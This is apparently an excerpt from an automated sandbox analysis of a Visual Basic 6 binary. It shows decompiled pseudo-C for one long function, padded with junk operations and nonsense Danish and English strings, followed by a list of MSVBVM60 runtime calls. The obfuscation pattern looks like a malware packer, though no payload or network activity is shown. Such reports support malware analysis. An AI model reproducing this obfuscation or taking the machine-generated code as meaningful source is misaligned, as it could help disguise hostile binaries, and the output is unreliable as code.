      				L00401846();
      				_push( &_v216);
      				_push( &_v200);
      				_push( &_v184);
      				_push(3);
      				L00401840();
      				_t1069 = _t1068 + 0x10;
      				if(_v380 != 0) {
      					_push(L"7:7:7");
      					__eax =  &_v184;
      					_push( &_v184); // executed
      					L0040182E(); // executed
      					__eax =  &_v184;
      					_push( &_v184);
      					L00401834();
      					L0040183A();
      					L00401828();
      					_v272 = L"Readjust";
      					_v280 = 8;
      					L0040184C();
      					__eax =  &_v184;
      					_push( &_v184);
      					__eax =  &_v200;
      					_push( &_v200);
      					L0040181C();
      					__eax =  &_v200;
      					_push( &_v200);
      					__eax =  &_v144;
      					L00401858();
      					_push(L"CANNIBALEAN");
      					_push(L"Bursati");
      					_push(L"multivalent"); // executed
      					L00401822(); // executed
      					L00401846();
      					__eax =  &_v200;
      					_push( &_v200);
      					__eax =  &_v184;
      					_push( &_v184);
      					_push(2);
      					L00401840();
      					__esp = __esp + 0xc;
      				}
      				_push( &_v184);
      				L0040180A();
      				_push( &_v184);
      				_t1082 =  *0x401258;
      				_push(_t932);
      				_push(_t932);
      				_v92 = _t1082;
      				_push(0x402520);
      				_push( &_v200);
      				L00401810();
      				_v272 = 0xfffffff9;
      				_v280 = 0x8002;
      				_push( &_v200);
      				_t671 =  &_v280;
      				_push(_t671);
      				L00401816();
      				_v380 = _t671;
      				_push( &_v200);
      				_push( &_v184);
      				_push(2);
      				L00401840();
      				_t1070 = _t1069 + 0xc;
      				if(_v380 != 0) {
      					_v176 = 1;
      					_v184 = 2;
      					_push(0);
      					_push( &_v184);
      					L00401804();
      					L0040183A();
      					L00401828();
      					_push( &_v184);
      					L004017FE();
      					_push( &_v184);
      					L00401834();
      					L0040183A();
      					L00401828();
      				}
      				_v272 = L"replicr";
      				_v280 = 8;
      				L0040184C();
      				_t675 =  &_v184;
      				_push(_t675);
      				L004017F8();
      				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
      				L00401828();
      				_t676 = _v380;
      				if(_t676 != 0) {
      					 *_v64 = 0x579;
      					 *((short*)(_v64 + 2)) = 0x23c6;
      					_v176 = 0x80020004;
      					_v184 = 0xa;
      					_t882 =  &_v184;
      					_push(_t882);
      					L004017F2();
      					_t989 = 2;
      					 *((short*)(_v64 + (_t989 << 1))) = _t882;
      					L00401828();
      					_t883 = 2;
      					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
      					_t885 = 2;
      					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
      					_t887 = 2;
      					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
      					_t889 = 2;
      					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
      					_v272 = 0x40253c;
      					_v280 = 8;
      					L0040184C();
      					_t891 =  &_v184;
      					_push(_t891);
      					_push(0x10);
      					L004017DA();
      					L0040183A();
      					_push(_t891);
      					L004017E0();
      					_v192 = _t891;
      					_v200 = 3;
      					_t892 =  &_v200;
      					_push(_t892);
      					L004017E6();
      					L0040183A();
      					_push(_t892);
      					L004017EC();
      					_t999 = 2;
      					 *((short*)(_v64 + _t999 * 7)) = _t892;
      					_push( &_v148);
      					_push( &_v144);
      					_push(2);
      					L004017D4();
      					_push( &_v200);
      					_push( &_v184);
      					_push(2);
      					L00401840();
      					_t1070 = _t1070 + 0x18;
      					_t897 = 2;
      					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
      					_t899 = 2;
      					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
      					_t901 = 2;
      					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
      					_v176 = 0x80020004;
      					_v184 = 0xa;
      					_t903 =  &_v184;
      					_push(_t903);
      					L004017F2();
      					_t1004 = 2;
      					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
      					L00401828();
      					_t904 = 2;
      					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
      					_t906 = 2;
      					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
      					_t908 = 2;
      					_t909 = _t908 * 0xe;
      					 *((short*)(_v64 + _t909)) = 0x34bb;
      					_push(L"OFFENTLIGHEDSSFRE");
      					L004017EC();
      					_t1010 = 2;
      					 *(_v64 + _t1010 * 0xf) = _t909;
      					_t910 = 2;
      					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
      					_t912 = 2;
      					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
      					_t914 = 2;
      					_t915 = _t914 * 0x12;
      					 *((short*)(_v64 + _t915)) = 0x6a6e;
      					_push(L"Dagvagten");
      					L004017EC();
      					_t1015 = 2;
      					 *(_v64 + _t1015 * 0x13) = _t915;
      					if( *0x4223c0 != 0) {
      						_v436 = 0x4223c0;
      					} else {
      						_push(0x4223c0);
      						_push(0x4025a0);
      						L004017CE();
      						_v436 = 0x4223c0;
      					}
      					_v380 =  *_v436;
      					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
      					asm("fclex");
      					_v384 = _t921;
      					if(_v384 >= 0) {
      						_v440 = _v440 & 0x00000000;
      					} else {
      						_push(0x14);
      						_push(0x402590);
      						_push(_v380);
      						_push(_v384);
      						L004017C8();
      						_v440 = _t921;
      					}
      					_v388 = _v168;
      					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
      					asm("fclex");
      					_v392 = _t926;
      					if(_v392 >= 0) {
      						_v444 = _v444 & 0x00000000;
      					} else {
      						_push(0x70);
      						_push(0x4025b0);
      						_push(_v388);
      						_push(_v392);
      						L004017C8();
      						_v444 = _t926;
      					}
      					_t676 = _v332;
      					_v104 = _t676;
      					L004017C2();
      				}
      				L004017BC();
      				L0040183A();
      				L004017BC();
      				L0040183A();
      				_v404 = _v152;
      				_v152 = _v152 & 0x00000000;
      				L0040183A();
      				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
      				L004017D4();
      				_v176 = 0x80020004;
      				_v184 = 0xa;
      				_t685 =  &_v184;
      				L004017F2();
      				_v344 = _t685;
      				_v336 = 0x6988;
      				L004017B6();
      				_v348 = 0x10e914;
      				_v332 = _v344;
      				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
      				_t695 = _v340;
      				_v52 = _t695;
      				L00401846();
      				L00401828();
      				_v348 = 0x40f600;
      				L004017B0();
      				L0040183A();
      				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
      				L00401846();
      				L004017B6();
      				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
      				_v380 = _t704;
      				if(_v380 >= 0) {
      					_v448 = _v448 & 0x00000000;
      				} else {
      					_push(0x6f8);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v448 = _t704;
      				}
      				_v408 = _v148;
      				_v148 = _v148 & 0x00000000;
      				L0040183A();
      				L00401846();
      				L004017AA();
      				_v368 = _t1082;
      				_v176 = _v368;
      				_v184 = 4;
      				_push( &_v200);
      				_t707 =  &_v184;
      				_push(_t707);
      				L004017A4();
      				_v380 = _t707;
      				if(_v380 >= 0) {
      					_v452 = _v452 & 0x00000000;
      				} else {
      					_push(_v380);
      					L0040179E();
      					_v452 = _t707;
      				}
      				L00401792();
      				_t708 =  &_v168;
      				L00401798();
      				_v384 = _t708;
      				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
      				asm("fclex");
      				_v388 = _t712;
      				if(_v388 >= 0) {
      					_v456 = _v456 & 0x00000000;
      				} else {
      					_push(0x1c);
      					_push(0x402650);
      					_push(_v384);
      					_push(_v388);
      					L004017C8();
      					_v456 = _t712;
      				}
      				_v364 = 0xed488;
      				_v360 = 0x711cb2;
      				_t713 =  &_v200;
      				L0040178C();
      				_v356 = _t713;
      				_v352 = 0x23dec;
      				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
      				_v392 = _t720;
      				if(_v392 >= 0) {
      					_v460 = _v460 & 0x00000000;
      				} else {
      					_push(0x6fc);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v392);
      					L004017C8();
      					_v460 = _t720;
      				}
      				L004017C2();
      				_t722 =  &_v184;
      				L00401840();
      				L00401786();
      				L0040183A();
      				L004017EC();
      				_v340 = _t722;
      				_v176 = 0x80020004;
      				_v184 = 0xa;
      				_t723 =  &_v184;
      				L004017F2();
      				_v344 = _t723;
      				L00401780();
      				_v348 = _t723;
      				_v336 = _v344;
      				_v332 = _v340;
      				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
      				_v380 = _t731;
      				if(_v380 >= 0) {
      					_v464 = _v464 & 0x00000000;
      				} else {
      					_push(0x700);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v464 = _t731;
      				}
      				L00401846();
      				L00401828();
      				_v176 = 0x80020004;
      				_v184 = 0xa;
      				_t732 =  &_v184;
      				L004017F2();
      				_v336 = _t732;
      				_v332 = _v336;
      				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
      				_v380 = _t737;
      				if(_v380 >= 0) {
      					_v468 = _v468 & 0x00000000;
      				} else {
      					_push(0x704);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v468 = _t737;
      				}
      				L00401828();
      				_v176 = 0x80020004;
      				_v184 = 0xa;
      				_t738 =  &_v184;
      				_push(_t738);
      				L004017F2();
      				_v336 = _t738;
      				_v192 =  *0x40124c;
      				_v200 = 4;
      				_push(0);
      				_push( &_v200);
      				_push( &_v216);
      				L0040177A();
      				_v224 = 0x80020004;
      				_v232 = 0xa;
      				_t741 =  &_v232;
      				_push(_t741);
      				L004017F2();
      				_v340 = _t741;
      				_t1086 =  *0x401248;
      				_v240 = _t1086;
      				_v248 = 4;
      				_push( &_v264);
      				_t743 =  &_v248;
      				_push(_t743);
      				L004017A4();
      				_v380 = _t743;
      				if(_v380 >= 0) {
      					_v472 = _v472 & 0x00000000;
      				} else {
      					_push(_v380);
      					L0040179E();
      					_v472 = _t743;
      				}
      				_v332 = _v340;
      				_v352 = 0x1eaaee;
      				_t745 =  &_v216;
      				L0040178C();
      				_v348 = _t745;
      				_t747 =  &_v264;
      				L0040178C();
      				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
      				_v136 = _v356;
      				L00401840();
      				L00401774();
      				_v376 = _t1086;
      				L0040185E();
      				L0040183A();
      				_t761 = _v156;
      				_v412 = _t761;
      				_v156 = _v156 & 0x00000000;
      				L0040176E();
      				_v348 = _t761;
      				L004017B6();
      				_t762 =  &_v152;
      				L0040183A();
      				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
      				_v416 = _v152;
      				_v152 = _v152 & 0x00000000;
      				L0040183A();
      				_t771 =  &_v144;
      				L004017D4();
      				L004017EC();
      				_v336 = _t771;
      				_v176 = 0x1ca534;
      				_v184 = 3;
      				_t772 =  &_v184;
      				L004017E6();
      				L0040183A();
      				L00401768();
      				_v352 = _t772;
      				_v332 = _v336;
      				_v348 = 0x761fa7;
      				_t776 =  &_v332;
      				L00401762();
      				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
      				_v380 = _t780;
      				if(_v380 >= 0) {
      					_v476 = _v476 & 0x00000000;
      				} else {
      					_push(0x708);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v476 = _t780;
      				}
      				L00401846();
      				L00401828();
      				L004017EC();
      				_v340 = _t780;
      				_v332 = 0x640;
      				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
      				_v132 = _v336;
      				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
      				_v84 = _v332;
      				_v336 = 0x393d;
      				_v332 = 0x67ff;
      				L004017B6();
      				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
      				_v380 = _t797;
      				if(_v380 >= 0) {
      					_v480 = _v480 & 0x00000000;
      				} else {
      					_push(0x70c);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v480 = _t797;
      				}
      				L00401846();
      				_v352 = 0x419a61;
      				_v348 = 0x5ea767;
      				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
      				_v380 = _t802;
      				if(_v380 >= 0) {
      					_v484 = _v484 & 0x00000000;
      				} else {
      					_push(0x710);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v484 = _t802;
      				}
      				_v272 = 0x402844;
      				_v280 = 8;
      				L0040184C();
      				L0040175C();
      				L00401834();
      				L0040183A();
      				L004017B6();
      				_v336 = 0x54f7;
      				_v332 = 0x147e;
      				_t808 =  &_v144;
      				L00401762();
      				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
      				_v44 = _v348;
      				L004017D4();
      				L00401840();
      				_v176 = 0xfffffff6;
      				_v184 = 2;
      				_t819 =  &_v184;
      				L00401804();
      				L0040183A();
      				L00401762();
      				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
      				_v380 = _t822;
      				if(_v380 >= 0) {
      					_v488 = _v488 & 0x00000000;
      				} else {
      					_push(0x714);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v488 = _t822;
      				}
      				L00401846();
      				L00401828();
      				L004017E0();
      				_v348 = _t822;
      				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
      				_v380 = _t827;
      				if(_v380 >= 0) {
      					_v492 = _v492 & 0x00000000;
      				} else {
      					_push(0x718);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v492 = _t827;
      				}
      				_v100 = _v352;
      				L00401756();
      				L0040183A();
      				L00401750();
      				L0040183A();
      				_v420 = _v164;
      				_v164 = _v164 & 0x00000000;
      				L0040183A();
      				_v424 = _v160;
      				_v160 = _v160 & 0x00000000;
      				L004017B6();
      				_t832 =  &_v152;
      				L0040183A();
      				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
      				_v380 = _t836;
      				if(_v380 >= 0) {
      					_v496 = _v496 & 0x00000000;
      				} else {
      					_push(0x71c);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v380);
      					L004017C8();
      					_v496 = _t836;
      				}
      				_v428 = _v156;
      				_v156 = _v156 & 0x00000000;
      				L0040183A();
      				_push( &_v164);
      				_push( &_v160);
      				_push( &_v152);
      				_push( &_v148);
      				_t842 =  &_v144;
      				_push(_t842);
      				_push(5);
      				L004017D4();
      				asm("fabs");
      				_v176 =  *0x401238;
      				asm("fnstsw ax");
      				if((_t842 & 0x0000000d) != 0) {
      					return __imp____vbaFPException();
      				}
      				_v184 = 5;
      				_push( &_v200);
      				_t845 =  &_v184;
      				_push(_t845);
      				L004017A4();
      				_v380 = _t845;
      				if(_v380 >= 0) {
      					_v500 = _v500 & 0x00000000;
      				} else {
      					_push(_v380);
      					L0040179E();
      					_v500 = _t845;
      				}
      				L0040182E();
      				_t848 =  &_v144;
      				L00401858();
      				L004017BC();
      				L0040183A();
      				_v224 = 0x80020004;
      				_v232 = 0xa;
      				_t849 =  &_v232;
      				L004017F2();
      				_v340 = _t849;
      				_v332 = _v340;
      				_v432 = _v152;
      				_v152 = _v152 & 0x00000000;
      				_t853 =  &_v332;
      				L0040183A();
      				_t854 =  &_v200;
      				L0040178C();
      				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
      				_v384 = _t857;
      				if(_v384 >= 0) {
      					_v504 = _v504 & 0x00000000;
      				} else {
      					_push(0x720);
      					_push(0x402344);
      					_push(_a4);
      					_push(_v384);
      					L004017C8();
      					_v504 = _t857;
      				}
      				_v92 = _v336;
      				L004017D4();
      				_t865 =  &_v184;
      				L00401840();
      				L004017EC();
      				_v336 = _t865;
      				L004017EC();
      				_v340 = _t865;
      				L004017B6();
      				_v332 = 0x2885;
      				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x40294c, 0x402904, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
      				L00401846();
      				E0042129F();
      				_v272 = 2;
      				_v280 = 2;
      				L0040174A();
      				_v272 = 0x806dac;
      				_v280 = 3;
      				L0040174A();
      				_t874 =  &_v184;
      				L00401744();
      				L0040178C();
      				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
      				_v8 = 0;
      				asm("wait");
      				_push(0x41d878);
      				L00401828();
      				L00401846();
      				_v348 =  &_v76;
      				_t879 =  &_v348;
      				_push(_t879);
      				_push(0);
      				L0040173E();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401846();
      				L00401828();
      				L00401846();
      				return _t879;
      			}

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041C202
      • __vbaAryConstruct2.MSVBVM60(?,004029B0,00000002,?,?,?,?,00401546), ref: 0041C23C
      • __vbaVarDup.MSVBVM60 ref: 0041C261
      • #522.MSVBVM60(?,?), ref: 0041C274
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C287
      • #713.MSVBVM60(00000000,?,?,?,?), ref: 0041C28D
      • #558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2A9
      • __vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C2C3
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C2DF
      • #541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C302
      • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C30E
      • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C318
      • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C323
      • __vbaVarDup.MSVBVM60 ref: 0041C348
      • #524.MSVBVM60(?,?), ref: 0041C35B
      • __vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C36E
      • #690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C383
      • __vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C38E
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C3A3
      • #610.MSVBVM60(?,?,?,?,00401546), ref: 0041C3B2
      • #661.MSVBVM60(?,00402520,?,?,?,?,?,?,?,00401546), ref: 0041C3D5
      • __vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C3FC
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C418
      • #705.MSVBVM60(00000002,00000000), ref: 0041C448
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C452
      • __vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C45D
      • #670.MSVBVM60(00000002,00000002,00000000), ref: 0041C469
      • __vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C475
      • __vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C47F
      • __vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C48A
      • __vbaVarDup.MSVBVM60 ref: 0041C4AF
      • #560.MSVBVM60(?), ref: 0041C4BB
      • __vbaFreeVar.MSVBVM60(?), ref: 0041C4D8
      • #648.MSVBVM60(0000000A,?), ref: 0041C518
      • __vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041C52F
      • __vbaVarDup.MSVBVM60(0000000A,?), ref: 0041C590
      • #606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C59E
      • __vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041C5AB
      • __vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041C5B1
      • #574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5CD
      • __vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5DA
      • #696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C5E0
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041C602
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041C61A
      • #648.MSVBVM60(0000000A), ref: 0041C66A
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041C682
      • #696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6B9
      • #696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C6FD
      • __vbaNew2.MSVBVM60(004025A0,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041C722
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041C787
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C7E3
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041C808
      • #519.MSVBVM60(tilskrersaksene,?), ref: 0041C812
      • __vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041C81F
      • #519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C825
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C832
      • __vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041C856
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041C896
      • #648.MSVBVM60(0000000A), ref: 0041C8B9
      • __vbaStrCopy.MSVBVM60 ref: 0041C8D9
      • __vbaFreeStr.MSVBVM60 ref: 0041C93D
      • __vbaFreeVar.MSVBVM60 ref: 0041C948
      • #527.MSVBVM60(Forretningsbrevet5), ref: 0041C95C
      • __vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041C969
      • __vbaFreeStr.MSVBVM60 ref: 0041C98A
      • __vbaStrCopy.MSVBVM60 ref: 0041C99A
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041C9E2
      • __vbaStrMove.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA12
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA1D
      • #535.MSVBVM60(00000000,00401260,00402344,000006F8), ref: 0041CA22
      • #564.MSVBVM60(00000004,?), ref: 0041CA51
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CA6B
      • #685.MSVBVM60(00000004,?), ref: 0041CA7F
      • __vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CA8C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041CAD3
      • __vbaI4Var.MSVBVM60(?), ref: 0041CB02
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB6E
      • __vbaFreeObj.MSVBVM60(00000000,00401260,00402344,000006FC), ref: 0041CB88
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041CB9D
      • #537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBAA
      • __vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBB7
      • #696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CBBD
      • #648.MSVBVM60(0000000A), ref: 0041CBE4
      • __vbaR8FixI4.MSVBVM60(0000000A), ref: 0041CBF6
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC6C
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC86
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000700), ref: 0041CC91
      • #648.MSVBVM60(0000000A), ref: 0041CCB1
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD07
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000704), ref: 0041CD21
      • #648.MSVBVM60(0000000A), ref: 0041CD41
      • #714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041CD73
      • #648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041CD93
      • #564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDC3
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CDDD
      • __vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE10
      • __vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041CE29
      • __vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041CE9A
      • #581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEA7
      • #713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEB7
      • __vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CEC4
      • __vbaFpI4.MSVBVM60 ref: 0041CEE2
      • __vbaStrCopy.MSVBVM60 ref: 0041CEF8
      • __vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041CF15
      • __vbaStrMove.MSVBVM60 ref: 0041CF56
      • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CF72
      • #696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041CF7F
      • #574.MSVBVM60(00000003), ref: 0041CFA6
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041CFB3
      • __vbaR8IntI4.MSVBVM60(00000003), ref: 0041CFBE
      • __vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041CFFB
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D038
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D052
      • __vbaFreeVar.MSVBVM60(00000000,00401260,00402344,00000708), ref: 0041D05D
      • #696.MSVBVM60(Kainsmrkernes3), ref: 0041D067
      • __vbaStrCopy.MSVBVM60 ref: 0041D0E6
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D144
      • __vbaFreeStr.MSVBVM60(00000000,00401260,00402344,0000070C), ref: 0041D15E
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1BF
      • __vbaVarDup.MSVBVM60(00000000,00401260,00402344,00000710), ref: 0041D1F3
      • #607.MSVBVM60(?,00000065,00000003), ref: 0041D208
      • __vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D214
      • __vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D221
      • __vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D231
      • __vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D267
      • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D2A7
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D2BF
      • #705.MSVBVM60(00000002,00000000), ref: 0041D2E4
      • __vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D2F1
      • __vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D2F7
      • __vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402344,00000714), ref: 0041D332
